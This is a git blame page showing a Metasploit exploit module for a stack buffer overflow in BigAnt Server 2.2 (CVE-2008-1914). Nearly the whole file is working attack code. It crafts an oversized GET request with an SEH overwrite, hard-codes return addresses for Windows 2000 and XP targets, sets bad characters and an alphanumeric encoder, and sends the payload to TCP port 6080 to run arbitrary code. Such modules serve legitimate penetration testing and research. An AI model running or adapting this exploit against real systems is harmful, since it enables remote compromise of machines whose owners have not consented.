Files
metasploit-gs/modules/exploits/windows/misc/bigant_server.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

67 lines
1.8 KiB
Ruby
Raw Normal View History

2008-05-15 00:58:44 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2008-05-15 00:58:44 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2008-05-15 00:58:44 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
2008-05-15 00:58:44 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'BigAnt Server 2.2 Buffer Overflow',
'Description' => %q{
2010-05-09 17:45:00 +00:00
This module exploits a stack buffer overflow in BigAnt Server 2.2.
By sending a specially crafted packet, an attacker may be
able to execute arbitrary code.
2008-05-15 00:58:44 +00:00
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
2008-05-15 00:58:44 +00:00
[ 'CVE', '2008-1914' ],
[ 'OSVDB', '44454' ],
2009-05-13 17:39:42 +00:00
[ 'BID', '28795' ],
2008-05-15 00:58:44 +00:00
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'AllowWin32SEH' => true
2008-05-15 00:58:44 +00:00
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
2008-05-15 00:58:44 +00:00
],
'DefaultTarget' => 0,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2008-04-15'))
2008-05-15 00:58:44 +00:00
register_options([Opt::RPORT(6080)])
2008-05-15 00:58:44 +00:00
end
def exploit
connect
2008-05-15 00:58:44 +00:00
sploit = "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret)
sploit << rand_text_alpha_upper(1024 - payload.encoded.length)
print_status("Trying target #{target.name}...")
2008-05-15 00:58:44 +00:00
sock.put(sploit + "\n\n")
handler
disconnect
end
2009-05-13 17:39:42 +00:00
end